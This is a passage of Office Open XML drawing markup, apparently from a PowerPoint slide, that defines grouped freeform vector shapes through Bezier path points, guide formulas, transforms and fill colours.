                      <a:pt x="8" y="72"/>
                      <a:pt x="8" y="72"/>
                      <a:pt x="98" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="97"/>
                      <a:pt x="105" y="94"/>
                      <a:pt x="105" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="90"/>
                      <a:pt x="105" y="90"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="31"/>
                      <a:pt x="102" y="26"/>
                      <a:pt x="98" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="25"/>
                      <a:pt x="98" y="25"/>
                      <a:pt x="8" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="6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44" name="Freeform 777">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97657FAE-001D-4C81-8512-7E615CCDC85D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418" y="1678"/>
                <a:ext cx="154" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 65"/>
                  <a:gd name="T1" fmla="*/ 61 h 66"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 24 h 66"/>
                  <a:gd name="T4" fmla="*/ 33 w 65"/>
                  <a:gd name="T5" fmla="*/ 5 h 66"/>
                  <a:gd name="T6" fmla="*/ 65 w 65"/>
                  <a:gd name="T7" fmla="*/ 42 h 66"/>
                  <a:gd name="T8" fmla="*/ 32 w 65"/>
                  <a:gd name="T9" fmla="*/ 6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66">
                    <a:moveTo>
                      <a:pt x="32" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="57"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="9"/>
                      <a:pt x="15" y="0"/>
                      <a:pt x="33" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="10"/>
                      <a:pt x="65" y="26"/>
                      <a:pt x="65" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="57"/>
                      <a:pt x="50" y="66"/>
                      <a:pt x="32" y="6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090" name="Group 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6CA3A0-DBDD-4F50-82DE-4D2DE76684E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221665" y="1851832"/>
              <a:ext cx="468313" cy="500063"/>
              <a:chOff x="1658" y="2536"/>
              <a:chExt cx="596" cy="637"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2112" name="Group 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40198386-DEE5-4411-8B02-BBE703B6BD71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1876" y="2536"/>
                <a:ext cx="378" cy="637"/>
                <a:chOff x="1876" y="2536"/>
                <a:chExt cx="378" cy="637"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2118" name="Group 106">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C42086E6-FCA0-4D67-9DAA-AED6599F4B3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876" y="2536"/>
                  <a:ext cx="343" cy="637"/>
                  <a:chOff x="4178" y="782"/>
                  <a:chExt cx="343" cy="637"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2128" name="Freeform 107">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374F29DF-5C71-42AF-80AA-04067932E3D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4321" y="1088"/>
                    <a:ext cx="121" cy="331"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 11 h 245"/>
                      <a:gd name="T10" fmla="*/ 3 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="3" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="229"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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74118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9" name="Freeform 108">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9B0638-4E94-4C3E-B94C-352BD0C3B53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4178" y="866"/>
                    <a:ext cx="343" cy="314"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 248 w 254"/>
                      <a:gd name="T1" fmla="*/ 194 h 232"/>
                      <a:gd name="T2" fmla="*/ 225 w 254"/>
                      <a:gd name="T3" fmla="*/ 49 h 232"/>
                      <a:gd name="T4" fmla="*/ 199 w 254"/>
                      <a:gd name="T5" fmla="*/ 24 h 232"/>
                      <a:gd name="T6" fmla="*/ 156 w 254"/>
                      <a:gd name="T7" fmla="*/ 13 h 232"/>
                      <a:gd name="T8" fmla="*/ 116 w 254"/>
                      <a:gd name="T9" fmla="*/ 2 h 232"/>
                      <a:gd name="T10" fmla="*/ 86 w 254"/>
                      <a:gd name="T11" fmla="*/ 12 h 232"/>
                      <a:gd name="T12" fmla="*/ 73 w 254"/>
                      <a:gd name="T13" fmla="*/ 86 h 232"/>
                      <a:gd name="T14" fmla="*/ 73 w 254"/>
                      <a:gd name="T15" fmla="*/ 86 h 232"/>
                      <a:gd name="T16" fmla="*/ 72 w 254"/>
                      <a:gd name="T17" fmla="*/ 91 h 232"/>
                      <a:gd name="T18" fmla="*/ 21 w 254"/>
                      <a:gd name="T19" fmla="*/ 104 h 232"/>
                      <a:gd name="T20" fmla="*/ 26 w 254"/>
                      <a:gd name="T21" fmla="*/ 135 h 232"/>
                      <a:gd name="T22" fmla="*/ 80 w 254"/>
                      <a:gd name="T23" fmla="*/ 122 h 232"/>
                      <a:gd name="T24" fmla="*/ 80 w 254"/>
                      <a:gd name="T25" fmla="*/ 122 h 232"/>
                      <a:gd name="T26" fmla="*/ 86 w 254"/>
                      <a:gd name="T27" fmla="*/ 120 h 232"/>
                      <a:gd name="T28" fmla="*/ 99 w 254"/>
                      <a:gd name="T29" fmla="*/ 113 h 232"/>
                      <a:gd name="T30" fmla="*/ 104 w 254"/>
                      <a:gd name="T31" fmla="*/ 92 h 232"/>
                      <a:gd name="T32" fmla="*/ 104 w 254"/>
                      <a:gd name="T33" fmla="*/ 92 h 232"/>
                      <a:gd name="T34" fmla="*/ 110 w 254"/>
                      <a:gd name="T35" fmla="*/ 47 h 232"/>
                      <a:gd name="T36" fmla="*/ 110 w 254"/>
                      <a:gd name="T37" fmla="*/ 47 h 232"/>
                      <a:gd name="T38" fmla="*/ 109 w 254"/>
                      <a:gd name="T39" fmla="*/ 164 h 232"/>
                      <a:gd name="T40" fmla="*/ 118 w 254"/>
                      <a:gd name="T41" fmla="*/ 175 h 232"/>
                      <a:gd name="T42" fmla="*/ 169 w 254"/>
                      <a:gd name="T43" fmla="*/ 189 h 232"/>
                      <a:gd name="T44" fmla="*/ 196 w 254"/>
                      <a:gd name="T45" fmla="*/ 169 h 232"/>
                      <a:gd name="T46" fmla="*/ 194 w 254"/>
                      <a:gd name="T47" fmla="*/ 88 h 232"/>
                      <a:gd name="T48" fmla="*/ 192 w 254"/>
                      <a:gd name="T49" fmla="*/ 75 h 232"/>
                      <a:gd name="T50" fmla="*/ 194 w 254"/>
                      <a:gd name="T51" fmla="*/ 88 h 232"/>
                      <a:gd name="T52" fmla="*/ 215 w 254"/>
                      <a:gd name="T53" fmla="*/ 204 h 232"/>
                      <a:gd name="T54" fmla="*/ 248 w 254"/>
                      <a:gd name="T55" fmla="*/ 194 h 2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254" h="232">
                        <a:moveTo>
                          <a:pt x="248" y="194"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="245" y="184"/>
                          <a:pt x="228" y="67"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="222" y="32"/>
                          <a:pt x="207" y="27"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="191" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="144" y="10"/>
                          <a:pt x="125" y="4"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="89" y="4"/>
                          <a:pt x="86" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="15"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="86"/>
                          <a:pt x="73" y="86"/>
                          <a:pt x="73" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="91"/>
                          <a:pt x="72" y="91"/>
                          <a:pt x="72" y="91"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="28" y="103"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="119"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="69"/>
                          <a:pt x="109" y="49"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="47"/>
                          <a:pt x="110" y="47"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="122"/>
                          <a:pt x="109" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="169"/>
                          <a:pt x="112" y="174"/>
                          <a:pt x="118" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="130" y="177"/>
                          <a:pt x="162" y="187"/>
                          <a:pt x="169" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="177" y="190"/>
                          <a:pt x="193" y="181"/>
                          <a:pt x="196" y="169"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="141"/>
                          <a:pt x="196" y="111"/>
                          <a:pt x="194" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="192" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="197" y="110"/>
                          <a:pt x="204" y="150"/>
                          <a:pt x="215" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="221" y="232"/>
                          <a:pt x="254" y="218"/>
                          <a:pt x="248" y="194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74118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30" name="Freeform 109">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB31EC5F-E7AB-4D9E-88BA-C990BA62306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4340" y="852"/>
                    <a:ext cx="89" cy="55"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 9 w 66"/>
                      <a:gd name="T3" fmla="*/ 22 h 41"/>
                      <a:gd name="T4" fmla="*/ 15 w 66"/>
                      <a:gd name="T5" fmla="*/ 12 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="9" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="15" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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3175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31" name="Oval 110">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA98718C-A8E7-4D03-BEA2-6534690F8DF6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gray">
                  <a:xfrm flipH="1">
                    <a:off x="4331" y="782"/>
                    <a:ext cx="106" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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19" name="Group 111">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E770A961-EB4B-471B-9945-9AEE8FE0CA4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2127" y="2897"/>
                  <a:ext cx="127" cy="137"/>
                  <a:chOff x="2408" y="1629"/>
                  <a:chExt cx="127" cy="137"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2121" name="Freeform 112">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19EF6DD-088D-4600-9DE6-FCD1F41D72B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408" y="1645"/>
                    <a:ext cx="127" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 227"/>
                      <a:gd name="T1" fmla="*/ 47 h 62"/>
                      <a:gd name="T2" fmla="*/ 177 w 227"/>
                      <a:gd name="T3" fmla="*/ 0 h 62"/>
                      <a:gd name="T4" fmla="*/ 227 w 227"/>
                      <a:gd name="T5" fmla="*/ 12 h 62"/>
                      <a:gd name="T6" fmla="*/ 47 w 227"/>
                      <a:gd name="T7" fmla="*/ 62 h 62"/>
                      <a:gd name="T8" fmla="*/ 0 w 227"/>
                      <a:gd name="T9" fmla="*/ 47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7" h="62">
                        <a:moveTo>
                          <a:pt x="0" y="47"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="177" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="227" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="62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2" name="Freeform 113">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4655A5DE-3884-4BA6-BC48-06E6638035B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434" y="1651"/>
                    <a:ext cx="101" cy="115"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 180"/>
                      <a:gd name="T1" fmla="*/ 206 h 206"/>
                      <a:gd name="T2" fmla="*/ 0 w 180"/>
                      <a:gd name="T3" fmla="*/ 50 h 206"/>
                      <a:gd name="T4" fmla="*/ 180 w 180"/>
                      <a:gd name="T5" fmla="*/ 0 h 206"/>
                      <a:gd name="T6" fmla="*/ 180 w 180"/>
                      <a:gd name="T7" fmla="*/ 158 h 206"/>
                      <a:gd name="T8" fmla="*/ 0 w 180"/>
                      <a:gd name="T9" fmla="*/ 206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0" h="206">
                        <a:moveTo>
                          <a:pt x="0" y="206"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="50"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="180" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="180" y="158"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="206"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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3" name="Freeform 114">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C2B195-0386-4EE9-8E21-8688E4E7AC6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408" y="1671"/>
                    <a:ext cx="26" cy="95"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 47"/>
                      <a:gd name="T1" fmla="*/ 0 h 171"/>
                      <a:gd name="T2" fmla="*/ 0 w 47"/>
                      <a:gd name="T3" fmla="*/ 159 h 171"/>
                      <a:gd name="T4" fmla="*/ 47 w 47"/>
                      <a:gd name="T5" fmla="*/ 171 h 171"/>
                      <a:gd name="T6" fmla="*/ 47 w 47"/>
                      <a:gd name="T7" fmla="*/ 15 h 171"/>
                      <a:gd name="T8" fmla="*/ 0 w 47"/>
                      <a:gd name="T9" fmla="*/ 0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7" h="171">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="159"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="171"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="1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4" name="Freeform 115">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AF37CF7-24EC-41C0-9819-AAF605CA469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487" y="1632"/>
                    <a:ext cx="11" cy="26"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 19"/>
                      <a:gd name="T1" fmla="*/ 0 h 47"/>
                      <a:gd name="T2" fmla="*/ 0 w 19"/>
                      <a:gd name="T3" fmla="*/ 42 h 47"/>
                      <a:gd name="T4" fmla="*/ 19 w 19"/>
                      <a:gd name="T5" fmla="*/ 47 h 47"/>
                      <a:gd name="T6" fmla="*/ 19 w 19"/>
                      <a:gd name="T7" fmla="*/ 4 h 47"/>
                      <a:gd name="T8" fmla="*/ 0 w 19"/>
                      <a:gd name="T9" fmla="*/ 0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47">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="19" y="47"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="19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E47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5" name="Freeform 116">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAAE72B-DA5A-4642-9FAD-2AD412BDABB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446" y="1632"/>
                    <a:ext cx="58" cy="40"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 104 w 104"/>
                      <a:gd name="T1" fmla="*/ 0 h 73"/>
                      <a:gd name="T2" fmla="*/ 0 w 104"/>
                      <a:gd name="T3" fmla="*/ 28 h 73"/>
                      <a:gd name="T4" fmla="*/ 0 w 104"/>
                      <a:gd name="T5" fmla="*/ 73 h 73"/>
                      <a:gd name="T6" fmla="*/ 14 w 104"/>
                      <a:gd name="T7" fmla="*/ 68 h 73"/>
                      <a:gd name="T8" fmla="*/ 14 w 104"/>
                      <a:gd name="T9" fmla="*/ 37 h 73"/>
                      <a:gd name="T10" fmla="*/ 92 w 104"/>
                      <a:gd name="T11" fmla="*/ 16 h 73"/>
                      <a:gd name="T12" fmla="*/ 92 w 104"/>
                      <a:gd name="T13" fmla="*/ 47 h 73"/>
                      <a:gd name="T14" fmla="*/ 104 w 104"/>
                      <a:gd name="T15" fmla="*/ 45 h 73"/>
                      <a:gd name="T16" fmla="*/ 104 w 104"/>
                      <a:gd name="T17" fmla="*/ 0 h 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4" h="73">
                        <a:moveTo>
                          <a:pt x="104" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="28"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="73"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="14" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="14" y="37"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="92" y="16"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="92" y="47"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="104" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="104" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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6" name="Freeform 117">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DB87A3-132D-4AAB-9BDA-745FFA4EED9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437" y="1645"/>
                    <a:ext cx="9" cy="27"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 16"/>
                      <a:gd name="T1" fmla="*/ 0 h 50"/>
                      <a:gd name="T2" fmla="*/ 0 w 16"/>
                      <a:gd name="T3" fmla="*/ 43 h 50"/>
                      <a:gd name="T4" fmla="*/ 16 w 16"/>
                      <a:gd name="T5" fmla="*/ 50 h 50"/>
                      <a:gd name="T6" fmla="*/ 16 w 16"/>
                      <a:gd name="T7" fmla="*/ 5 h 50"/>
                      <a:gd name="T8" fmla="*/ 0 w 16"/>
                      <a:gd name="T9" fmla="*/ 0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50">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="50"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="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E47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7" name="Freeform 118">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0DB8C9-56B5-41F2-9C5C-10CFCA161B0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gray">
                  <a:xfrm>
                    <a:off x="2437" y="1629"/>
                    <a:ext cx="67" cy="18"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 120"/>
                      <a:gd name="T1" fmla="*/ 28 h 33"/>
                      <a:gd name="T2" fmla="*/ 101 w 120"/>
                      <a:gd name="T3" fmla="*/ 0 h 33"/>
                      <a:gd name="T4" fmla="*/ 120 w 120"/>
                      <a:gd name="T5" fmla="*/ 5 h 33"/>
